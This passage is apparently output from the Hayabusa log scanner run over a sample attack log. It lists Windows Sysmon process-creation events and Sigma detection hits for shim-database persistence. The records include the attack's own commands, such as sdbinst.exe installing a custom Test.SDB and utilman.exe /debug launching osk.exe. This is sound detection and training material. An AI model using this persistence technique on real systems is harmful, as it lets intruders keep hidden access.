C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:13.151 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\VBoxService.exe : Path: C:\Windows\System32\VBoxService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:13.181 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:13.221 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.232 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k GPSvcGroup : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.603 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\spoolsv.exe : Path: 
C:\Windows\System32\spoolsv.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:14.933 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.094 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Startup : Path: C:\Windows\System32\gpscript.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.144 +09:00,PC01.example.corp,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.154 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" : Path: C:\Program Files\freeSSHd\FreeSSHDService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.424 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.514 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.795 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.835 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.865 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.885 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.915 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process 
Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:15.995 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.065 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.135 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,informational,Process Creation,Command: calc.exe : Path: C:\Windows\System32\calc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.406 +09:00,PC01.example.corp,1,high,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.436 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe : Path: C:\Windows\System32\wlms\wlms.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:16.626 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:17.026 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\UI0Detect.exe : Path: C:\Windows\System32\UI0Detect.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:41:22.404 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe SYSTEM : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.148 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""taskhost.exe"" : Path: C:\Windows\System32\taskhost.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.329 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.419 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\slui.exe"" : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:00.489 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:37.392 +09:00,PC01.example.corp,1,informational,Process Creation,Command: gpscript.exe /Logon : Path: C:\Windows\System32\gpscript.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\svchost.exe -k 
GPSvcGroup,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:37.432 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:37.602 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:38.654 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run key"" : Path: C:\Windows\System32\cmd.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:38.704 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\PSEXESVC.exe"" : Path: C:\Windows\PSEXESVC.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:42:38.774 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: msg * ""hello from run key"" : Path: C:\Windows\System32\msg.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Windows\System32\cmd.exe"" /c msg * ""hello from run 
key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:43:24.560 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows Media Player\wmpnetwk.exe"" : Path: C:\Program Files\Windows Media Player\wmpnetwk.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:46:04.916 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:46:20.518 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" : Path: C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe : User: EXAMPLE\user01 : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.439 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.559 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.860 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.870 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via 
sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:33.920 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:48:36.644 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.787 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.967 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator 
(32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:27.988 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:31.212 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: 
winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" : Path: C:\Windows\System32\sdbinst.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,high,Possible Shim Database Persistence via sdbinst.exe,,rules/sigma/process_creation/win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.972 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:44.982 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug : Path: C:\Windows\System32\Utilman.exe : User: EXAMPLE\user01 : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 05:49:45.152 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: EXAMPLE\user01 : Parent Command: 
